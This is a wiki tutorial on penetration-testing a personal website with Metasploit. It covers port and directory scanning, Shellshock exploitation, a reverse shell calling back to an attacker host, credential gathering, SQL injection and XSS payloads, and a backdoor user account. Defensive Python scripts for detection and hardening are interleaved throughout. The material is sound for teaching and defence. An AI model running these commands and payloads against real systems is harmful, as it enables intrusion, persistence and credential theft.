METASPLOIT - Pentest a Personal Website

From IT-Arts.net
Revision as of 16:39, 13 December 2025 by Admin


Starting Metasploit

First, launch Metasploit's console to begin the penetration test:

msfconsole

Information Gathering

Information gathering is the first phase of penetration testing, and Metasploit offers various auxiliary modules to gather valuable data about the target website.

Scanning for Open Ports

To find open ports on the target website's server, use the TCP port scanner module. It performs full TCP connect scans, so every probe reaches the target's firewall log and the scanning host is easy to spot from the number of distinct ports it touches in a short time:

use auxiliary/scanner/portscan/tcp
set RHOSTS <target_ip>
set THREADS 10
run
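As an added detection-side example (not part of the original page), the Python script below shows what this scan looks like from the server's side: it parses a few constructed iptables-style kernel log lines and reports any source that hits at least five distinct destination ports within ten seconds. The log format, the addresses and the thresholds are assumptions chosen for the demonstration.

```python
"""Detect a TCP port scan from iptables-style kernel log lines.

Constructed sample: one host (198.51.100.7) probes six ports within three
seconds, the pattern a connect scan produces; another (203.0.113.5) only
fetches the website over 80 and 443.
"""
import re
from collections import defaultdict
from datetime import datetime

SAMPLE_LOG = """\
Jan 10 12:00:01 web kernel: IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.5 PROTO=TCP SPT=51000 DPT=21 SYN
Jan 10 12:00:01 web kernel: IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.5 PROTO=TCP SPT=51001 DPT=22 SYN
Jan 10 12:00:02 web kernel: IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.5 PROTO=TCP SPT=51002 DPT=25 SYN
Jan 10 12:00:02 web kernel: IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.5 PROTO=TCP SPT=51003 DPT=80 SYN
Jan 10 12:00:03 web kernel: IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.5 PROTO=TCP SPT=51004 DPT=443 SYN
Jan 10 12:00:03 web kernel: IN=eth0 OUT= SRC=198.51.100.7 DST=10.0.0.5 PROTO=TCP SPT=51005 DPT=8080 SYN
Jan 10 12:00:40 web kernel: IN=eth0 OUT= SRC=203.0.113.5 DST=10.0.0.5 PROTO=TCP SPT=40222 DPT=80 SYN
Jan 10 12:00:41 web kernel: IN=eth0 OUT= SRC=203.0.113.5 DST=10.0.0.5 PROTO=TCP SPT=40223 DPT=443 SYN
"""

# Timestamp, source address and destination port are all the detection needs.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) .*?SRC=(?P<src>[\d.]+) "
    r".*?PROTO=TCP .*?DPT=(?P<dpt>\d+)"
)


def parse_events(log_text):
    """Return (timestamp, source_ip, dst_port) tuples for the lines that match."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        # Syslog lines carry no year; strptime fills in a default, which is
        # fine because only differences between timestamps are used.
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
        events.append((ts, m.group("src"), int(m.group("dpt"))))
    return events


def find_scanners(events, window_seconds=10, min_ports=5):
    """Map source_ip -> largest number of distinct ports it hit inside one window."""
    by_src = defaultdict(list)
    for ts, src, dpt in events:
        by_src[src].append((ts, dpt))
    flagged = {}
    for src, hits in by_src.items():
        hits.sort()
        left = 0
        for right in range(len(hits)):
            # Advance the window's left edge until it spans at most window_seconds.
            while (hits[right][0] - hits[left][0]).total_seconds() > window_seconds:
                left += 1
            ports = {p for _, p in hits[left:right + 1]}
            if len(ports) >= min_ports:
                flagged[src] = max(flagged.get(src, 0), len(ports))
    return flagged


if __name__ == "__main__":
    for src, n in find_scanners(parse_events(SAMPLE_LOG)).items():
        print(f"possible port scan from {src}: {n} distinct ports")
```

The thresholds are deliberately low for the sample; on a real host, tune window_seconds and min_ports against normal traffic, and remember that a scan with THREADS 10 compresses the whole pattern into a second or two.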

OS and Service Fingerprinting

The SMB version scanner reports the SMB dialect and, where the host exposes it, the operating system name and version. It only returns anything if the port scan showed TCP 445 open; a personal website on a Linux host usually does not expose SMB, so expect no result there:

use auxiliary/scanner/smb/smb_version
set RHOSTS <target_ip>
run

Web Scanning for Vulnerabilities

The directory scanner enumerates paths on the web server from a wordlist; it does not test for SQL injection or XSS, which need a web-application scanner or manual verification of each input. The module takes its candidate paths from the DICTIONARY option (a file with one entry per line, for example admin, login and wp-login.php), not from a PATHS option:

use auxiliary/scanner/http/dir_scanner
set RHOSTS <target_ip>
set DICTIONARY /path/to/wordlist.txt
run

Exploiting Vulnerabilities

Once information gathering is complete, you can search for known exploits for the identified vulnerabilities.

Searching for Exploits

Search for available exploits related to the website's technology stack:

search type:exploit <technology_or_vulnerability>

Example of Exploit Execution

The module below is the Shellshock exploit for bash reached through Apache mod_cgi. It applies only when the server runs CGI scripts under an unpatched bash, not to any vulnerable Apache or PHP version in general, and TARGETURI must name a CGI script that actually exists on the target:

use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS <target_ip>
set TARGETURI /cgi-bin/test.cgi
run
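The following Python script is an added example for the defender's side of both the directory scan above and the Shellshock exploit, not code from the original page. It parses constructed Apache combined-format access log lines and applies two checks: one client requesting several admin-style paths and collecting 404s (the wordlist-scan pattern), and any request whose User-Agent or Referer starts a bash function definition (the `() {` marker the CGI exploit relies on). The log lines, addresses and path list are assumptions made for the demonstration.

```python
"""Two checks over Apache combined-format access log lines (constructed here):

1. path enumeration: a client requesting several admin-style paths and
   getting 404s, which is what a wordlist scan looks like from the server;
2. Shellshock probes: a request whose User-Agent or Referer begins a bash
   function definition ('() {'), the header content the CGI exploit needs.
"""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Paths a scan of a personal site typically probes first (assumed list).
SENSITIVE_PREFIXES = ("/admin", "/login", "/wp-login.php", "/phpmyadmin")
SHELLSHOCK_MARK = "() {"

SAMPLE_LOG = """\
198.51.100.7 - - [10/Jan/2025:12:01:00 +0000] "GET /admin HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2025:12:01:00 +0000] "GET /login HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2025:12:01:01 +0000] "GET /wp-login.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2025:12:01:05 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2025:12:01:06 +0000] "GET /login HTTP/1.1" 404 196 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2025:12:02:30 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "-" "() { :; }; echo probe"
"""


def parse_access_log(log_text):
    """Return one dict per well-formed line; malformed lines are skipped."""
    rows = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            rows.append(m.groupdict())
    return rows


def find_path_enumeration(rows, min_paths=3):
    """Clients that got 404 on at least min_paths distinct sensitive paths."""
    seen = defaultdict(set)
    for r in rows:
        if r["status"] == "404" and r["path"].startswith(SENSITIVE_PREFIXES):
            seen[r["ip"]].add(r["path"])
    return {ip: sorted(paths) for ip, paths in seen.items() if len(paths) >= min_paths}


def find_shellshock_probes(rows):
    """(ip, path) for every request carrying the function-definition marker.

    The marker is abnormal in any header whatever the path, so no CGI-path
    filter is applied; the path is reported so the responder knows which
    script was aimed at.
    """
    return [
        (r["ip"], r["path"])
        for r in rows
        if SHELLSHOCK_MARK in r["ua"] or SHELLSHOCK_MARK in r["referer"]
    ]


if __name__ == "__main__":
    rows = parse_access_log(SAMPLE_LOG)
    print("path enumeration:", find_path_enumeration(rows))
    print("shellshock probes:", find_shellshock_probes(rows))
```

A 500 on the CGI request, as in the sample, is what an unpatched bash typically produces when the injected header breaks the script's environment; a patched bash ignores the marker and the request looks like any other. The mitigation is a patched bash and not serving CGI scripts that are not needed.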

Post-Exploitation

After successfully exploiting the target, post-exploitation helps in maintaining access and extracting more sensitive data.

Creating a Reverse Shell

After gaining access, a reverse shell payload gives an interactive session on the target. The payload is selected inside a handler rather than with use payload/..., and RHOSTS does not apply because the target connects back to LHOST:LPORT. The session lasts only while that connection is open, so note the LPORT so the listener can be shut down in the Clean Up phase:

use exploit/multi/handler
set PAYLOAD linux/x86/shell_reverse_tcp
set LHOST <attacker_ip>
set LPORT 4444
run

Dumping Web Server Credentials

To collect web application credentials from a compromised host, use Metasploit's post-exploitation modules. Post modules run through an existing session (SESSION), not against RHOSTS; confirm that the module path exists in your installation with search path:post/multi/gather before relying on it:

use post/multi/gather/enum_web_app_users
set SESSION <session_id>
run

Exploiting Web Application Vulnerabilities

If a web application vulnerability such as SQL Injection is discovered, you can use Metasploit's web application exploitation tools.

Using SQL Injection Exploits

For a site vulnerable to SQL injection, the usual approach is a module written for the affected application and version. Confirm the module path with search phpmyadmin and read its option names from show options before running it; treat the command below as a template whose option names must match the module's own:

use exploit/multi/http/phpmyadmin_sql_injection
set RHOSTS <target_ip>
set TARGETURI /phpmyadmin
set SQL_PAYLOAD "1' OR 1=1--"
run

Using Cross-Site Scripting (XSS) Exploit

For a site vulnerable to XSS, you can attempt an exploit like the following. As with the SQL injection case, confirm the module path with search and its option names with show options first; note in particular that PAYLOAD is the datastore option that selects a Metasploit payload module, so a module that accepts a script string would expose it under a different option name:

use exploit/multi/http/xss
set RHOSTS <target_ip>
set TARGETURI /search.php
set PAYLOAD "alert('XSS')"
run
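The Python script below is an added example, not code from the original page, showing the two web-application flaws of this section from the application's side: each vulnerable handler next to its hardened form, exercised with the page's own payloads against an in-memory SQLite table. The table, the user names and the wrapping of the XSS payload in a script tag are assumptions made for the demonstration.

```python
"""SQL injection and XSS, each as the vulnerable handler next to its fix.

Uses an in-memory SQLite table (constructed) and the payloads from the page;
the XSS payload is wrapped in a script tag as an assumed delivery form.
"""
import html
import sqlite3

PAYLOAD_SQLI = "1' OR 1=1--"
PAYLOAD_XSS = "<script>alert('XSS')</script>"


def make_db():
    """Constructed sample table with three users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    return conn


def lookup_vulnerable(conn, user_id):
    """String concatenation: the quote in the payload closes the literal and
    '--' comments out the rest, so the WHERE clause becomes id='1' OR 1=1
    and every row comes back."""
    sql = f"SELECT name FROM users WHERE id = '{user_id}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(conn, user_id):
    """Bound parameter: the value travels separately from the SQL text, so it
    can only ever be compared as data and the payload matches nothing."""
    rows = conn.execute("SELECT name FROM users WHERE id = ? ORDER BY id", (user_id,))
    return [row[0] for row in rows]


def render_vulnerable(term):
    """Echoes the search term into HTML verbatim: markup in, markup out."""
    return f"<p>Results for: {term}</p>"


def render_hardened(term):
    """Escapes on output, so the browser renders the term as text."""
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup:", lookup_vulnerable(db, PAYLOAD_SQLI))
    print("hardened lookup:  ", lookup_hardened(db, PAYLOAD_SQLI))
    print(render_vulnerable(PAYLOAD_XSS))
    print(render_hardened(PAYLOAD_XSS))
```

The same two fixes apply to any language and database: parameterised queries for everything that reaches SQL, and contextual output encoding for everything that reaches HTML. Escaping on output rather than on input is what keeps the hardened search page correct for legitimate terms that happen to contain angle brackets.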

Maintaining Access

Once you’ve exploited a vulnerability and have gained access to the system, maintaining access is critical for further testing.

Adding a Backdoor User

You can add a backdoor user to maintain persistent access. The post module runs through an existing session; record the username so the account can be removed in the Clean Up phase:

use post/linux/manage/adduser
set SESSION <session_id>
set USERNAME <username>
set PASSWORD <password>
run

Creating a Reverse Shell Payload

Another way to keep a foothold is a further reverse shell through the same handler used in Post-Exploitation; each caught connection appears in sessions -l and must be killed in Clean Up:

use exploit/multi/handler
set PAYLOAD linux/x86/shell_reverse_tcp
set LHOST <attacker_ip>
set LPORT 4444
run
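As an added example for the defender's side of the two reverse shell passages (Post-Exploitation and Maintaining Access), not code from the original page, the Python script below parses constructed `ss -tnp`-style output and applies two heuristics that together catch what a shell_reverse_tcp session looks like on the host: a shell or scripting interpreter holding an established TCP connection, and a web server process acting as a client instead of serving on its listening port. The process names, addresses and the port 4444 in the sample are assumptions matching this page's setup.

```python
"""Spot the process-side fingerprint of a reverse shell in `ss -tnp` output.

Two heuristics, each applied to ESTABLISHED TCP connections:
1. a shell or scripting interpreter owns the socket (a web server never
   needs bash to hold a network connection);
2. a web server process acts as a client (ephemeral local port, non-loopback
   peer), which is what a payload launched from an exploited CGI script
   looks like before it hands over to a shell.
The sample output is constructed for the demonstration.
"""
import re

INTERPRETERS = {"sh", "bash", "dash", "zsh", "nc", "ncat", "python", "python3", "perl", "php"}
WEB_SERVERS = {"apache2", "httpd", "nginx", "php-fpm"}

ROW_RE = re.compile(
    r'^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)

SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port   Process
ESTAB  0      0      10.0.0.5:80         203.0.113.5:52310   users:(("apache2",pid=812,fd=9))
ESTAB  0      0      10.0.0.5:22         203.0.113.40:61022  users:(("sshd",pid=1301,fd=4))
ESTAB  0      0      10.0.0.5:51044      198.51.100.7:4444   users:(("apache2",pid=812,fd=11))
ESTAB  0      0      10.0.0.5:43122      198.51.100.7:4444   users:(("bash",pid=2417,fd=3))
"""


def parse_ss(text):
    """One dict per connection row; the header line does not match and is dropped."""
    return [m.groupdict() for m in map(ROW_RE.match, text.splitlines()) if m]


def local_port(addr):
    """Port part of an 'address:port' string (rsplit copes with IPv6 colons)."""
    return int(addr.rsplit(":", 1)[1])


def find_reverse_shells(rows):
    """(process, pid, peer, reason) for every suspicious established connection."""
    hits = []
    for r in rows:
        if r["state"] != "ESTAB":
            continue
        reason = None
        if r["proc"] in INTERPRETERS:
            reason = "interpreter holding a network socket"
        elif (r["proc"] in WEB_SERVERS
              and local_port(r["local"]) >= 1024
              and not r["peer"].startswith("127.")):
            # Connections to loopback upstreams (php-fpm, a local cache) are normal.
            reason = "web server process connecting out"
        if reason:
            hits.append((r["proc"], int(r["pid"]), r["peer"], reason))
    return hits


if __name__ == "__main__":
    for proc, pid, peer, reason in find_reverse_shells(parse_ss(SAMPLE_SS)):
        print(f"{proc}[{pid}] -> {peer}: {reason}")
```

On a live host, the same check run from cron or an EDR rule is the simplest way to notice a session that survived the Clean Up phase; an egress firewall rule that blocks the web server's outbound connections to arbitrary ports prevents the callback in the first place.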

Reporting

Once the penetration test is complete, you can generate a detailed report of your findings, including all exploited vulnerabilities and actions taken.

Generating a Report

The spool command writes everything the console prints between spool <file> and spool off to that file as plain text (whatever the file extension), which is the raw material for the report:

spool /path/to/report.html
<commands whose output should be recorded>
spool off

Clean Up

After the penetration test, it's crucial to clean up any backdoors or other remnants left behind on the target system.

Remove Backdoor User

If you added any backdoor users, remove them through the session so the system is no longer compromised, then confirm on the host that the account is gone:

use post/linux/manage/remove_user
set SESSION <session_id>
set USERNAME <username>
run
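The Python script below is an added example, not code from the original page, covering both the Adding a Backdoor User step and this cleanup step from the defender's side: it compares two snapshots of /etc/passwd, lists the accounts added or removed between them, and flags the dangerous additions (a second UID 0 account, or a new account with an interactive shell). Run against the baseline and the post-engagement snapshot it exposes the backdoor user; run against the post-engagement and post-cleanup snapshots it confirms the removal. The snapshots and account names are constructed for the demonstration.

```python
"""Diff two /etc/passwd snapshots (constructed here) and flag risky additions."""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}

BASELINE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""
# After the engagement: a new interactive account plus a second UID 0 account.
AFTER_ENGAGEMENT = BASELINE + """\
pentest:x:1001:1001::/home/pentest:/bin/bash
toor:x:0:0::/root:/bin/bash
"""
# After cleanup the file should match the baseline again.
AFTER_CLEANUP = BASELINE


def parse_passwd(text):
    """Map user name -> {uid, gid, home, shell}; blank and comment lines are skipped."""
    users = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, home, shell = line.split(":")
        users[name] = {"uid": int(uid), "gid": int(gid), "home": home, "shell": shell}
    return users


def diff_accounts(before_text, after_text):
    """Accounts added, removed or changed between two snapshots, with findings
    for the additions a defender should look at first."""
    before, after = parse_passwd(before_text), parse_passwd(after_text)
    added = sorted(set(after) - set(before))
    removed = sorted(set(before) - set(after))
    # An existing account whose uid or shell changed is as suspicious as a new one.
    changed = sorted(n for n in set(before) & set(after) if before[n] != after[n])
    findings = []
    for name in added:
        info = after[name]
        if info["uid"] == 0:
            findings.append((name, "uid 0 account that is not root"))
        elif info["shell"] not in NOLOGIN_SHELLS:
            findings.append((name, f"new interactive account with shell {info['shell']}"))
    return {"added": added, "removed": removed, "changed": changed, "findings": findings}


if __name__ == "__main__":
    print("engagement:", diff_accounts(BASELINE, AFTER_ENGAGEMENT))
    print("cleanup:   ", diff_accounts(AFTER_ENGAGEMENT, AFTER_CLEANUP))
```

The same comparison belongs in the report: the baseline snapshot taken before testing and the post-cleanup snapshot together prove that every account the test created was removed.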

Deleting Reverse Shells

If you created any reverse shell listeners or sessions, terminate them. sessions -K kills every open session; the handlers themselves run as background jobs and are stopped with jobs -K:

sessions -K
jobs -K